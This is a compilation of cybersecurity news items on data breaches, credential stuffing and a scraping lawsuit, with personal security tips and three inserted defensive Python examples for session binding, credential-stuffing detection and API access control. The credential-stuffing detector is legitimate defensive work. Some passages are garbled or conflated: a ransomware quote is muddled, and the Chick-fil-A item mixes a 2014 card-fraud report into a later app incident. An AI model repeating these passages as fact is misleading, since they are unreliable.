Don't make it simple for con artists to guess. Did you know that the word "password" is one of the most popular passwords? Another common one is 123456. Simple passwords are easy to remember, but none of us can expect to remember every password we have, and fortunately there are some excellent password manager products available. The best cloud-based password manager, according to Finder.com.au, is LastPass, which is also reasonably priced. 1Password was singled out as a flexible password manager that is particularly useful for iPhone or Mac users. Both can generate passwords, check your accounts for security holes, flag insecure passwords that should be changed, and synchronise your passwords between your computer and smartphone.

Multi-factor authentication 

The Cyber Security Stakeholder Group (CSSG), a group made up of the ATO, tax practitioner industry groups, governmental organisations, and industry partners, advises that we should all use multi-factor authentication whenever possible. Multi-factor authentication requires users to provide multiple pieces of information when logging into a website, such as a code from a text message sent to your phone. Adding this extra layer of security makes your accounts harder for others to access.

Consider a credit ban 

Think someone has stolen your identity? By obtaining a credit ban, you can prevent scammers from taking out loans in your name, and it is a free service. IDCare.org, an independent organisation that offers free assistance to people affected by fraud or scams, advises that you can apply to credit reporting agencies for a credit ban to prevent people from obtaining credit or loans in your name. The initial 21-day ban can be extended. When a bank or credit provider checks your eligibility for credit, it consults the credit reporting agencies; if a ban is on your credit report, that check fails when someone attempts to take out a loan in your name.

Maintain software updates

The Australian Tax Office reports an increase in the use of malicious software. It is easy to accidentally click on an email or website link that infects your computer.

"Your device might occasionally be affected by ransomware. When you use ransomware, your computer can be locked until you pay a fee to let criminals install software that gives them access to your bank accounts and lets them steal your money," the ATO warned. The response? Install the most recent security updates, perform routine antivirus scans, and use a spam filter on your email accounts to protect yourself. Weekly malware and anti-virus scans should be conducted, and security software should be current. 

Consult your bank 

You may have received correspondence from your bank about enhancing security as a result of the most recent data breaches. For instance, Westpac requires the presentation of forms of identification. So that no one can pretend to be you, request additional checks from your financial institution. 

To alert you to any unusual activity on your accounts, the Commonwealth Bank advises customers to activate location-based security, set notification preferences, and review registered devices. Yet another wise move? If you're worried about your accounts right now, consider lowering your daily withdrawal limits.

Mass Data Scraping Lawsuit Filed by Meta



As part of a lawsuit filed against the digital surveillance firm Voyager Labs, Meta claims that the company created 38,000 fake, unauthorized accounts to collect 600,000 Facebook users' personal information. 

The federal lawsuit asks a California court to ban Voyager from Facebook and Instagram, claiming that the company scraped the "viewable profile information" of users of both platforms: their posts, likes, friend lists, photos, and comments. Facebook groups and pages were also allegedly tapped for data.

According to Gizmodo, Voyager pitched its tool to companies interested in monitoring social media without being detected and sold it to the highest bidder.

In addition, Twitter, YouTube, LinkedIn, and Telegram accounts were created to scrape data. So far, Meta, the company that owns Facebook, is the only social media firm that has taken legal action against Voyager. 

In a blog post about the legal filing, Meta said that Voyager had violated Facebook's terms of service on fake accounts, automated scraping, and account automation. To hide its activity, Voyager used a network of computers spread across many different countries to scrape user data, Meta added.

A free trial of Voyager's software was used by the Los Angeles Police Department in 2019, according to The Guardian in 2021. 

Following a pitch from the company, they purchased it as a surveillance tool to monitor thousands of online friends of potential suspects.  

It has been reported in the Guardian that LAPD was told that through this tool, officers would be able to "predict" crimes before they occur and communicate with potential victims.  

PCMag's request for comment from Voyager was not immediately answered. The Supreme Court allowed Meta earlier this week to pursue a lawsuit against Israeli spyware company NSO Group, which had gained access to WhatsApp servers "unlawfully" when installing spyware on users' devices through their WhatsApp accounts. 

Last month, Meta accepted a one-year settlement in a class-action lawsuit in which the plaintiffs accused it of sharing users' personal data with third parties without their consent, a move that did not end well for Meta.

The lawsuit, filed in 2018, followed the revelation that the company had shared the personal information of up to 87 million Facebook users with a British consulting firm, Cambridge Analytica.

CircleCI Breach: Encryption Keys & User Data Seized

The software company CircleCI has acknowledged that a data breach last month resulted in the theft of customers' personal information.

Hackers broke into the company in December after an engineer's laptop was infected with data-stealing malware that captured CircleCI's 2FA-backed SSO session cookies and used them to access the company's internal systems. CircleCI disclosed the security breach earlier this month and urged customers to change their credentials and passwords.

The company accepted responsibility for the breach and blamed a system failure, noting that its antivirus program missed the token-stealing malware on the employee's laptop. Session tokens let users stay logged in without constantly re-typing their password or re-authenticating with two-factor authentication. That is exactly why a stolen session token is dangerous: an attacker who holds it can access the same resources as the account holder without knowing the password or the two-factor code, and a server cannot easily distinguish a session token presented by the account owner from one presented by a hacker.

According to CircleCI, the stolen session token allowed the hackers to impersonate the employee and gain access to a subset of the business systems that store client data. In response, CircleCI says it rotated all customer-related tokens, including Project API Tokens, Personal API Tokens, and GitHub OAuth tokens. The company also worked with Atlassian and AWS to alert clients of potentially compromised AWS and Bitbucket tokens.
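To make a stolen session token like the one used here worth less to whoever holds it, and to give endpoint detections something to fire on, a session store can bind each token to the client that obtained it and revoke on mismatch. This is an added example in Python, not CircleCI's code; the fingerprint fields, the lifetimes and the revoke_all_for_user helper (the rotation step described above, applied to sessions) are assumptions.

```python
"""Session tokens bound to the issuing client, with short lifetimes and a
revocation hook for incident response.

Fingerprints here are deliberately coarse (IP + User-Agent). Mobile networks
change IPs, so a mismatch is a step-up or revocation event and an alert,
not proof of compromise on its own.
"""
import hashlib
import secrets
from dataclasses import dataclass


@dataclass
class Session:
    user: str
    fingerprint: str
    issued_at: float
    last_seen: float
    revoked: bool = False


class SessionStore:
    def __init__(self, absolute_ttl=8 * 3600, idle_ttl=30 * 60):
        self.absolute_ttl = absolute_ttl   # hard cap on session age (seconds)
        self.idle_ttl = idle_ttl           # max gap between requests (seconds)
        self._sessions = {}                # token -> Session
        self.alerts = []                   # (reason, user, token) for the SOC

    @staticmethod
    def fingerprint(ip, user_agent):
        return hashlib.sha256(f"{ip}|{user_agent}".encode()).hexdigest()

    def issue(self, user, ip, user_agent, now):
        """Mint an opaque 256-bit token bound to this client's fingerprint."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = Session(user, self.fingerprint(ip, user_agent), now, now)
        return token

    def validate(self, token, ip, user_agent, now):
        """Return (ok, reason). Every failure except 'unknown' revokes the token,
        so a replayed token is dead for the attacker AND the legitimate user,
        who simply logs in again (with 2FA)."""
        s = self._sessions.get(token)
        if s is None:
            return False, "unknown"
        if s.revoked:
            return False, "revoked"
        if now - s.issued_at > self.absolute_ttl:
            s.revoked = True
            return False, "expired"
        if now - s.last_seen > self.idle_ttl:
            s.revoked = True
            return False, "idle"
        if s.fingerprint != self.fingerprint(ip, user_agent):
            s.revoked = True
            self.alerts.append(("fingerprint_mismatch", s.user, token))
            return False, "fingerprint_mismatch"
        s.last_seen = now
        return True, "ok"

    def revoke_all_for_user(self, user):
        """Incident response: kill every live session for a user and return
        how many were revoked (the session-level equivalent of token rotation)."""
        count = 0
        for s in self._sessions.values():
            if s.user == user and not s.revoked:
                s.revoked = True
                count += 1
        return count
```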

CircleCI says that, to further harden its infrastructure, it has added detections for the behaviour of the information-stealing malware to its antivirus and mobile device management (MDM) programs.

"While client data was encrypted, the cybercriminals also gained the encryption keys able to decrypt consumer data," said Rob Zuber, the company's chief technology officer. Researchers therefore urge customers who have not already rotated their credentials to do so, to prevent unauthorized access to third-party systems and stores. The company has additionally tightened the security of its 2FA solution and further limited access to its production environment to a smaller group of users.

Norton LifeLock Issues a Warning for Password Manager Account Breach


Customers of Norton LifeLock have been the victims of a credential-stuffing attack. According to the company, cyberattackers used a third-party list of stolen username and password combinations to attempt to log into Norton accounts and, potentially, password managers.

Gen Digital, the LifeLock brand's owner, is mailing data-breach notifications to customers, stating that the activity was detected on December 12 when its intrusion detection systems flagged "an unusually high number of failed logins" on Norton accounts. According to the company, a 10-day investigation traced the activity back to December 1.

While Gen Digital did not specify how many accounts were compromised, it did warn customers that the attackers had access to names, phone numbers, and mailing addresses from any Norton account. And it added, "we cannot rule out that the unauthorized third party also obtained details stored [in the Norton Password Manager], especially if your Password Manager key is identical or very similar to your Norton account password." 

Those "details" are, of course, the strong passwords generated for any online services used by the victim, such as corporate logins, online banking, tax filing, messaging apps, e-commerce sites, and so on.

Threat actors utilize a list of logins acquired from another source — such as purchasing cracked account information on the Dark Web — to try against new accounts, hoping that users have repurposed their email addresses and passwords across multiple services. As a result, the irony of the Norton incident is not lost on Roger Grimes, KnowBe4's data-driven defense evangelist.
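The failed-login spike that Gen Digital's systems caught is the signature worth alerting on: many distinct accounts failing from one source, with only one or two attempts each, which is the opposite shape to brute force against a single account. The detector below is an added example run over constructed log lines, not Gen Digital's or Norton's code; the log format and the thresholds are assumptions.

```python
"""Detect credential stuffing in authentication logs and list the accounts
that need a forced password reset.

Credential stuffing looks different from brute force on one account: each
account sees one or two failures, but a single source fails against MANY
distinct accounts within a short window. The detector keys on that ratio.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "<timestamp> <result> user=<email> ip=<addr>"
SAMPLE_LOG = """\
2022-12-12T09:00:01 FAIL user=alice@example.com ip=203.0.113.7
2022-12-12T09:00:02 FAIL user=bob@example.com ip=203.0.113.7
2022-12-12T09:00:02 FAIL user=carol@example.com ip=203.0.113.7
2022-12-12T09:00:03 OK   user=dave@example.com ip=203.0.113.7
2022-12-12T09:00:04 FAIL user=erin@example.com ip=203.0.113.7
2022-12-12T09:00:05 FAIL user=frank@example.com ip=203.0.113.7
2022-12-12T09:00:05 FAIL user=grace@example.com ip=203.0.113.7
2022-12-12T09:01:00 FAIL user=heidi@example.com ip=198.51.100.9
2022-12-12T09:01:30 FAIL user=heidi@example.com ip=198.51.100.9
2022-12-12T09:02:00 FAIL user=heidi@example.com ip=198.51.100.9
2022-12-12T09:02:30 OK   user=heidi@example.com ip=198.51.100.9
"""


def parse_line(line):
    ts, result, user_field, ip_field = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "ok": result == "OK",
        "user": user_field.split("=", 1)[1],
        "ip": ip_field.split("=", 1)[1],
    }


def detect_credential_stuffing(lines, window=timedelta(minutes=5),
                               min_distinct_users=5, max_attempts_per_user=2.0):
    """Return {source_ip: sorted distinct users} for sources that, within
    `window`, fail against at least `min_distinct_users` accounts while
    averaging no more than `max_attempts_per_user` failures per account.
    A single account hammered from one IP (heidi above) is brute force and
    is left to a separate per-account rule."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    failures_by_ip = defaultdict(list)
    for e in events:
        if not e["ok"]:
            failures_by_ip[e["ip"]].append(e)

    flagged = {}
    for ip, fails in failures_by_ip.items():
        hits, start = set(), 0
        for end in range(len(fails)):             # sliding window over failures
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            span = fails[start:end + 1]
            users = {f["user"] for f in span}
            if len(users) >= min_distinct_users and len(span) / len(users) <= max_attempts_per_user:
                hits |= users
        if hits:
            flagged[ip] = sorted(hits)
    return flagged


def successful_logins_after_stuffing(lines, flagged):
    """Accounts that logged in successfully from a flagged source: these are
    the likely-compromised accounts to reset and notify first."""
    hits = {parse_line(l)["user"] for l in lines if l.strip()
            if parse_line(l)["ok"] and parse_line(l)["ip"] in flagged}
    return sorted(hits)
```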

"If I understand the reported facts, the irony is that the victimized users would have probably been protected if they had used their involved password manager to create strong passwords on their Norton login account. Password managers create strong, perfectly random passwords that are essentially unguessable and uncrackable. The attack here seems to be that users self-created and used weak passwords to protect their Norton logon account that also protected their Norton password manager," he stated via email.

Identity and access management systems have recently become a favoured target, as a single compromise can unlock a veritable treasure trove of information across high-value accounts, not to mention a variety of enterprise pivot points for moving deeper into networks.

LastPass, for example, was targeted in August 2022 through an impersonation attack in which cyber attackers breached its development environment and stole source code and customer data. A follow-up attack on a cloud storage bucket utilized by the company occurred last month.

In March of last year, Okta revealed that cyberattackers had used a third-party customer support engineer's system to obtain access to an Okta back-end administrative panel used for customer management, among other things. There were approximately 366 customers affected, with two actual data breaches occurring.

No Evidence: Twitter Denies Hacking Claims and The Stolen Data Being Sold Online


Twitter has denied the claim of getting hacked and the stolen data being sold online. 

According to a LinkedIn post last week by Alon Gal, co-founder of the Israeli cybersecurity monitoring company Hudson Rock, a stolen dataset containing the email addresses of more than 200 million Twitter users has been discovered.

The breach would probably result in "hacking, targeted phishing, and doxxing," according to Gal, who labeled it as a "significant leak" and said that the information had been uploaded on an internet hacker forum. 

He claimed that despite alerting the firm, Twitter, he had not received a response. 

"I urge security researchers to conduct a thorough examination of the leaked data and rule out Twitter's conclusion of the data being an enrichment of some sort which did not originate from their own servers," says Alon Gal. 

Twitter, however, has denied all claims that the emails, allegedly linked to users' accounts, were obtained through a hack.

Twitter responded to the issue by stating: "in response to recent media reports of Twitter users' data being sold online, we conducted a thorough investigation and there is no evidence that data recently being sold was obtained by exploiting a vulnerability of Twitter systems."

According to Twitter, the records in question were instead probably a collection of data "already publicly available online", though it still warns users to be wary of suspicious emails.

Gal, meanwhile, disputed Twitter's answer in a fresh LinkedIn post: "The authenticity of the leak is evident in the lack of false positives between Twitter usernames and emails found in the database, opposite to cases of data enrichments."

The disclosure came to light following the multiple reports that Twitter data of millions of users – 5.4 million in November 2022, 400 million in December 2022, and 200 million last week – have been exposed online for sale on cybercrime forums. 

The Breach Could Not Be Correlated to Previous or New Incidents 

Twitter, in its latest post says that the latest dataset breach of 200 million users “could not be correlated with the previously reported incident, nor with any new incident or any data originating from an exploitation of Twitter systems.” 

It added that, “None of the datasets analyzed contained passwords or information that could lead to passwords being compromised.” 

Moreover, in December 2022, another set of reports claimed that 400 million email addresses and phone numbers were stolen from Twitter – which the company denied as well.  

Hackers Release Private Information Following an Attack on the San Francisco Transit Police


Malicious hackers have uploaded a vast collection of private documents from the police department of a San Francisco Bay Area transit system to the internet, including specific claims of child abuse. 

The breach involves the Bay Area Rapid Transit (BART) Police Department. BART's chief communications officer, Alicia Trost, said in an email that authorities were looking into the uploaded files and that BART services had not been affected by the hackers. The exact date of the hack is unknown.

The culprits are part of a well-known ransomware hacker group that targets particular businesses and either encrypts private files or threatens to post them on the dark web. A review by NBC News found that the website where the BART Police leaks were posted contains more than 120,000 files.

Among the files are at least six scanned, unredacted reports describing alleged child abuse. These reports include the names and dates of birth of the children who are in danger, as well as descriptions of the alleged adult abusers in some cases. 

Ransomware hackers frequently demand payment in exchange for not publishing the stolen files. Trost declined to provide more details, but Brett Callow, an analyst at the cybersecurity company Emsisoft, believes that the files being accessible online suggests that BART declined to pay.

Among the leaked documents are mental health record forms, which a police officer uses to refer a person for a mental health evaluation. Other files include hiring paperwork for prospective officers, police reports naming suspects in various crimes, and the names and licence numbers of contractors who have worked on BART projects.

Even though cyber extortion attacks on American public sector organisations, including police departments, have increased in frequency, such sensitive police file leaks are still uncommon. According to a survey conducted by Emsisoft, ransomware hackers successfully attacked over 100 networks connected to local government organisations last year. 

According to a Treasury Department estimate, ransomware attacks cost American businesses $886 million in 2021, the most recent year for which data is available. 

“Unfortunately, not enough progress has been made in securing public sector organizations,” Callow stated. “They can compromise investigations, resulting in exceptionally sensitive information leaking online, and even put people’s lives at risk — both officers and the public's.” 

A different hacker group broke into the Washington, D.C., Metropolitan Police Department in 2021 and released private information about 22 officers after the department refused to pay. 

Such hackers frequently target school districts in their attacks. Due to a "cyber security incident," which is a phrase frequently used to refer to a ransomware attack, Des Moines Public Schools cancelled classes on Tuesday. According to Emsisoft, ransomware affected nearly 2,000 American schools in 2022.

Twitter Data Breach Indicates How APIs Are a Goldmine for PII and Social Engineering


A Twitter API vulnerability that was detected in June 2021, and was later patched, has apparently been haunting the organization yet again. 

In December 2022, a hacker claimed to have access to the personal data of 400 million Twitter users for sale on the dark web markets. And only yesterday, the attacker published the account details and email addresses of 235 million users. 

The breached data revealed by the hacker includes account names, handle creation dates, follower counts, and the email addresses of victims. With this, threat actors can also design social engineering campaigns to dupe people into handing over further personal data.

Twitter: A Social Engineering Goldmine 

Social media giants provide threat actors with a gold mine of user data and personal information that they can utilize in order to perform social engineering scams. 

With just a username, an email address, and the publicly available context of a user's profile, a hacker can conduct reconnaissance on a target and build phishing and scam campaigns specifically designed to dupe them into providing personal information.

In this case, while the exposed information was limited to users’ information available publicly, the immense volume of accounts exposed in a single location (Twitter) has in fact provided a “goldmine of information” to the threat actors. 

The Link Between Social Engineering and API Attacks 

Unsecured APIs give cybercriminals direct access to users' Personally Identifiable Information (PII), such as the username and password captured when a user connects to a third-party service's API. An API attack thus gives threat actors a window to collect large amounts of personal information for scams.

An instance of this happened just a month ago when a threat actor leveraged an API flaw to gather the data of 80,000 executives throughout the private sector and sell it on the dark web. The threat actor had applied successfully to the FBI's InfraGard intelligence sharing service. 

The data collected during the incident included usernames, email addresses, Social Security numbers, and dates of birth of victims. This highly valuable information was utilized by the threat actors for developing social engineering dupes and spear phishing attacks. 

How to Protect APIs and PII? 

One of the main challenges faced while combating API breaches is how modern enterprises need to detect and secure a large number of APIs. A single vulnerability can put user data at risk of exfiltration, therefore there is little room for error. 

“Protecting organizations from API attacks requires consistent, diligent oversight of vendor management, and specifically ensuring that every API is fit for use […] It’s a lot for organizations to manage, but the risk is too great not to,” says Chris Bowen, CISO at ClearDATA.  “In healthcare, for example, where patient data is at stake, every API should address several components like identity management, access management, authentication, authorization, data transport, exchange security, and trusted connectivity.”

Security teams are also advised not to rely solely on simple authentication options like username and password to secure their APIs.

“In today’s environment, basic usernames and passwords are no longer enough […] It’s now vital to use standards such as two-factor authentication (2FA) and/or secure authentication with OAuth,” says Will Au, senior director for DevOps, operations, and site reliability at Jitterbit. 

Moreover, measures such as utilizing a Web Application Firewall (WAF), and monitoring API traffic in real time can aid in detecting malicious activities, ultimately minimizing the risk of compromise.  
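Putting the advice above together (authentication stronger than username and password, OAuth-style scopes, and limits on traffic), the following is an added example of a minimal policy layer in front of a user-lookup API; it is not code from Twitter, Jitterbit or ClearDATA. The HMAC-signed token format, the user directory and the rate-limit thresholds are constructed stand-ins for what an identity provider and gateway would supply.

```python
"""Scoped, MFA-aware access tokens, per-subject rate limiting and field-level
PII minimisation for a user-lookup endpoint.

The token is a constructed HMAC-signed JSON blob standing in for an OAuth
access token; a real service validates tokens issued by its identity
provider rather than hand-rolling this.
"""
import base64
import hashlib
import hmac
import json
from collections import defaultdict, deque

SIGNING_KEY = b"constructed-demo-key-do-not-reuse"   # assumption: shared with the IdP

# Constructed directory. Only a subset of fields is ever returned.
USERS = {
    "u1": {"handle": "alice", "followers": 42,
           "email": "alice@example.com", "phone": "+1-555-0100"},
}
PUBLIC_FIELDS = {"handle", "followers"}   # safe for any authenticated caller
PII_FIELDS = {"email", "phone"}            # need explicit scope AND an MFA-backed session


def b64encode_url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64decode_url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(subject, scopes, mfa, exp, key=SIGNING_KEY):
    """Issue a token; `mfa` records whether the caller completed 2FA."""
    payload = json.dumps({"sub": subject, "scope": sorted(scopes),
                          "mfa": bool(mfa), "exp": exp}, sort_keys=True).encode()
    sig = hmac.new(key, payload, hashlib.sha256).digest()
    return f"{b64encode_url(payload)}.{b64encode_url(sig)}"


def verify_token(token, now, key=SIGNING_KEY):
    """Return the claims, or None if the signature or expiry check fails."""
    try:
        payload_enc, sig_enc = token.split(".")
        payload, sig = b64decode_url(payload_enc), b64decode_url(sig_enc)
    except (ValueError, TypeError):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    claims = json.loads(payload)
    return claims if claims.get("exp", 0) > now else None


class RateLimiter:
    """Sliding-window counter keyed by token subject, not source IP, so a
    scraper cannot reset its budget by rotating addresses."""

    def __init__(self, limit, window_seconds):
        self.limit, self.window = limit, window_seconds
        self._hits = defaultdict(deque)

    def allow(self, subject, now):
        q = self._hits[subject]
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class LookupAPI:
    def __init__(self, limiter):
        self.limiter = limiter

    def get_user(self, token, user_id, now):
        """Return (http_status, body) exposing only the fields the caller may see."""
        claims = verify_token(token, now)
        if claims is None:
            return 401, {"error": "invalid_token"}
        if "users:read" not in claims["scope"]:
            return 403, {"error": "insufficient_scope"}
        if not self.limiter.allow(claims["sub"], now):
            return 429, {"error": "rate_limited"}
        record = USERS.get(user_id)
        if record is None:
            return 404, {"error": "not_found"}
        fields = set(PUBLIC_FIELDS)
        if "users:read_pii" in claims["scope"] and claims["mfa"]:
            fields |= PII_FIELDS
        return 200, {k: v for k, v in record.items() if k in fields}
```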

Prosecutors Review Broward Administrators’ Action Over the Data Breach


Broward prosecutors are investigating whether the former Schools Superintendent, Robert Runcie, and two other administrators have infringed any law when they used highly guarded information about a district ransomware attack in a private business pitch. 

The district did not share details of the ransomware attack with the public; it brought in an outside PR firm to help deflect questions and avoided putting internal investigation details in writing.

Runcie and former administrators Brian Katz and Philip Dunn, on the other hand, revealed numerous previously concealed details regarding the ransomware attack in a September 2021 "case study" for Safer School Solutions, a Fort Lauderdale company owned by Katz and Dunn.

The report included details of how the ransomware attack hindered the operation of 2,000 servers; how the district prioritized keeping the schools open over looking after the breach; and how law enforcement asked the district to offer a ransom, but not pay it to the hackers. The report also involved the district’s response to the Parkland shooting and the pandemic. 

A few months later, an education group led by Runcie granted the company a $1 million contract to offer security services to six school districts, none of which were in Florida. 

Runcie, who resigned from his position as superintendent in August 2021, is currently facing accusations of perjury in a different case. He has been charged with lying to a statewide grand jury that investigated the school district purchases by the Attorney General's Office of Statewide Prosecution. 

Attempts to contact him by phone, email, and through his attorney remain unsuccessful. 

Broward Data Breach 

In November 2021, Broward County Public Schools reported that a security incident on March 7, 2021, may have resulted in unauthorized access to some of its systems, which potentially contained sensitive data of some faculty, staff, and students.

The district was initially unaware that any data had been compromised; the discovery may have been made during the investigation in June.

The Broward school district later announced on its website that the affected victims were being notified about the breach. About 50,000 students and employees reportedly received notifications from the district of their data being breached during the ransomware attack that happened months ago. 

The school district kept the attack, which happened between Nov. 12, 2020, and March 6, 2021, secret for months, apparently on the advice of the lawyers and public relations company it hired.

Hackers Target Chick-fil-A Customers Credentials

Chick-fil-A is investigating reports of suspicious transactions on its mobile app after multiple users claimed that hackers gained access to their personal data, including bank account details.

Customers at Chick-fil-A, a well-known chicken restaurant business, may be the latest targets of hackers. According to a recent article in Nation's Restaurant News, the fast food chain is investigating potential hacks of mobile apps that have exposed customers' sensitive information.

According to Krebs on Security, one bank claimed it had nearly 9,000 customer card details listed in an alert sent to various financial institutions regarding a breach at an anonymous retailer that occurred between December 2, 2013, and September 30, 2014, and that Chick-fil-A locations were the only common point-of-purchase. As per Krebs, "the majority of the fraud, according to a financial source, appeared to be centered at sites in Georgia, Maryland, Pennsylvania, Texas, and Virginia."

Customers who notice anything unusual are advised to change their passwords promptly to new ones that are distinct and complex and are not used for other online platforms or accounts.

In regard to the reports, Chick-fil-A posted a statement on social media stating that the company is aware of the matter and is working quickly to resolve it. The business does point out that it has not discovered proof that its internal security has been infiltrated by hackers or otherwise compromised.

Customers who are affected can find information on what to do if they see suspicious activity on their accounts, mobile orders placed without their consent, or loyalty points fraudulently redeemed or used to purchase gifts, on a support page of the Chick-fil-A One Membership Program's customer service website.